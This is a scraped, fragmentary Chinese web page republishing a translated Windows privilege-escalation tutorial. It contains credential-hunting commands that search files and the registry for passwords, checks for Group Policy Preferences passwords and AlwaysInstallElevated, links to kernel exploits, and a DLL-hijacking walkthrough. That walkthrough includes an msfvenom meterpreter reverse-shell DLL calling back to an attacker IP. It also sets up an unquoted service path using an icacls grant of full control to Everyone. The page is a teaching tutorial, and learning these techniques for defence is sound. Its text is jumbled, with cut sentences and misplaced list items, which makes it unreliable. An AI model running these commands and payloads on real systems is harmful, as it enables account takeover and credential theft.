时间:2023-06-30 15:12:01 | 来源:网站运营
时间:2023-06-30 15:12:01 来源:网站运营
Window 提权基础:本篇教程是笔者翻译国外大牛 fuzzysecurity 的文章http://www.fuzzysecurity.com/tutorials/16.html再加上个人的理解写出的关于 Windows 提权基础的文章,其中有些地方因为不太实用所以做了适当修改,感谢
@hl0rey
的帮助和建议。https://www.youtube.com/watch?v=kMG8IsCohHAWindows Attacks: AT is the new black (Chris Gates & Rob Fuller)
https://www.youtube.com/watch?v=_8xJaaQlpBoElevating privileges by exploiting weak folder permissions (Parvez Anwar)
http://www.greyhathacker.net/?p=738
https://www.computerhope.com/wmic.htm令人遗憾的是有些 Windows 的默认配置不允许使用 WMIC,除非用户是在管理员组里面。从对 WMIC 的测试中我注意到任何版本的 XP 系统都不允许低权限账号使用 WMIC。相反,默认安装的 Windows 7 Professional 和 Windows 8 企业版却允许使用低权限账号使用 WMIC 来查询系统信息而不需要修改任何设置。惊不惊喜,意不意外?
http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar你也可以从这里下载我利用脚本收集的信息样本
http://www.fuzzysecurity.com/tutorials/files/Win7.html
https://github.com/SecWiki/windows-kernel-exploits大家可以下载对应版本的 Windows 试试这些 EXP。
c:/sysprep.inf这些配置文件极可能包含明文密码,也可能会出现 base64 编码的情况,下面是一些配置文件的事例:
c:/sysprep/sysprep.xml
%WINDIR%/Panther/Unattend/Unattended.xml
%WINDIR%/Panther/Unattended.xml
如下所示,可以通过手动浏览 SYSVOL 并获取相关文件来利用此漏洞。Services/Services.xml
: Element-Specific AttributesScheduledTasks/ScheduledTasks.xml
: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner ElementPrinters/Printers.xml
: SharedPrinter ElementDrives/Drives.xml
: Element-Specific AttributesDataSources/DataSources.xml
: Element-Specific Attributes
post/windows/gather/credentials/gpp
https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp接下来我们要查找一个奇怪的注册表设置 "AlwaysInstallElevated" , 如果启动此设置,它会允许任何用户将 *.msi 文件安装为 NT AUTHORITY / SYSTEM 。
C:/Windows/system32> reg query HKLM/SOFTWARE/Policies/Microsoft/Windows/Installer/AlwaysInstallElevated最后我们也可能通过下面的命令来挖到未知的宝藏
C:/Windows/system32> reg query HKCU/SOFTWARE/Policies/Microsoft/Windows/Installer/AlwaysInstallElevated
C:/Windows/system32> dir /s *pass* == *cred* == *vnc* == *.config*Search certain file types for a keyword, this can generate a lot of output.
C:/Windows/system32> findstr /si password *.xml *.ini *.txtSimilarly the two commands below can be used to grep the registry for keywords, in this case "password".
C:/Windows/system32> reg query HKLM /f password /t REG_SZ /s
C:/Windows/system32> reg query HKCU /f password /t REG_SZ /s
https://download.sysinternals.com/files/SysinternalsSuite.zip接下来我们从 Windows 的服务开始,通过重新配置 service 的参数能够让我们快速达到目的。
@hl0rey
的建议和帮助,下面大家讲一讲我自己的骚姿势,虽然技术内容都不是我自己发明的,但是我将几种技术杂糅在一起之后居然产生了让我自己都感到惊讶的效果!!1 - The directory from which the application loaded通过上面的搜索路径可以看到第六点环境变量,这也是我们比较容易控制的路径,如果目标装有 python,那么
2 - 32-bit System directory (C:/Windows/System32)
3 - 16-bit System directory (C:/Windows/System)
4 - Windows directory (C:/Windows)
5 - The current working directory (CWD)
6 - Directories in the PATH environment variable (system then user)
Path = C:/Python27
就是我们可以控制的路径,我们只需要将恶意定制的 DLL 文件放到这个目录就可以。DllHijackAuditor
https://securityxploded.com/getsoftware_direct.php?id=7777自动检测我们刚才下载的软件是否存在 DLL 劫持,根据下图可以看到这里面存在一共 5 个 DLL 文件可供我们恶意劫持,这是我没想到的,我确实是在网上随便搜了一个软件而已,没想到居然会这么不经摧折!
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.175.143 lport=4444 -f dll -o /root/ext-ms-win-kernel32-package-current-l1-1-0.dll
echo %path%
sc create "times0ng test" binPath= "C:/Program Files (x86)/times0ng test/just test/evil.exe" start= auto
cd C:/Program Files (x86)
mkdir "times0ng test/just test"
icacls "C:/Program Files (x86)/times0ng test" /grant Everyone:(OI)(CI)F /T
use exploit/windows/local/trusted_service_path
关键词:基础